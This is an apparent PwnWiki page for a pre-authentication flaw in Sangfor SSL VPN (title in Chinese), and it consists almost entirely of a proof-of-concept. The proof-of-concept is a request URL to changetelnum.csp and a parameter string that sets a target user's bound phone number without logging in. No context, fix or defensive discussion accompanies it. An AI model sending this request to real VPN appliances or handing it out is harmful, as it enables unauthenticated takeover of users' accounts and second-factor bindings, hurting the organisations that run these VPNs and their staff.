深信服 SSL VPN - Pre Auth 修改綁定手機漏洞

From PwnWiki
Revision as of 18:15, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> https://www.0-sec.org/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 </pre>")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

https://www.0-sec.org/por/changetelnum.csp?apiversion=1

newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1